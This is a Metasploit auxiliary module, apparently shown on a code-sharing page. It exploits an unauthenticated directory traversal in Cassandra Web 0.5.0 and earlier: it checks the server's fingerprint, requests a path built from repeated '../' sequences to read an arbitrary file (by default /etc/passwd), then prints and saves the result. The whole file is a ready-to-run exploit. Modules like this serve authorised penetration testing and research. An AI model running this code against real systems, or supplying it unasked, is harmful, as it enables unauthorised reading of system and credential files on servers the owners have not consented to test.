Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Report
8
  include Msf::Auxiliary::Scanner
9
  include Msf::Exploit::Remote::HttpClient
10
  prepend Exploit::Remote::AutoCheck
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Cassandra Web File Read Vulnerability',
17
        'Description' => %q{
18
          This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web
19
          'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
20
          This vulnerability occurred due to the disabled Rack::Protection module
21
        },
22
        'References' => [
23
          ['URL', 'https://github.com/avalanche123/cassandra-web/commit/f11e47a26f316827f631d7bcfec14b9dd94f44be'],
24
          ['EDB', '49362']
25
        ],
26
        'Author' => [
27
          'Jeremy Brown', # Vulnerability discovery
28
          'krastanoel' # Metasploit module
29
        ],
30
        'License' => MSF_LICENSE,
31
        'Notes' => {
32
          'Stability' => [CRASH_SAFE],
33
          'Reliability' => [],
34
          'SideEffects' => []
35
        }
36
      )
37
    )
38

39
    register_options(
40
      [
41
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
42
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 8]),
43
        OptInt.new('RPORT', [true, 'The Cassandra Web port (default: 3000)', 3000])
44
      ]
45
    )
46
  end
47

48
  def check_host(_ip)
49
    res = send_request_cgi({
50
      'method' => 'GET',
51
      'uri' => normalize_uri(target_uri.path, '/')
52
    })
53

54
    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
55
    return Exploit::CheckCode::Safe('Target is not a Cassandra Web server') if res.code != 200
56

57
    if res.headers['server'] == 'thin' && res.body.include?('Cassandra Web') && res.body.include?('/js/cassandra.js')
58
      return Exploit::CheckCode::Appears('Cassandra Web Detected')
59
    else
60
      return Exploit::CheckCode::Safe('Target is not a Cassandra Web server')
61
    end
62
  rescue ::Rex::ConnectionError
63
    return Exploit::CheckCode::Unknown('Could not connect to the web service')
64
  end
65

66
  def run_host(ip)
67
    traversal = '../' * datastore['DEPTH']
68
    filename = datastore['FILEPATH']
69
    filename = filename[1, filename.length] if filename =~ %r{^/}
70

71
    res = send_request_cgi({
72
      'method' => 'GET',
73
      'uri' => normalize_uri(target_uri.path, '/' "#{traversal}#{filename}")
74
    })
75

76
    fail_with(Failure::Unreachable, 'Connection failed') unless res
77
    fail_with(Failure::NotVulnerable, 'Connection failed. Nothing was downloaded') if res.code != 200
78
    fail_with(Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter') if res.body.include?('/js/cassandra.js')
79

80
    print_status('Downloading file...')
81
    print_line("\n#{res.body}\n")
82

83
    fname = datastore['FILEPATH']
84

85
    path = store_loot(
86
      'cassandra.web.traversal',
87
      'text/plain',
88
      ip,
89
      res.body,
90
      fname
91
    )
92
    print_good("File saved in: #{path}")
93
  rescue ::Rex::ConnectionError
94
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
95
  end
96
end
97

98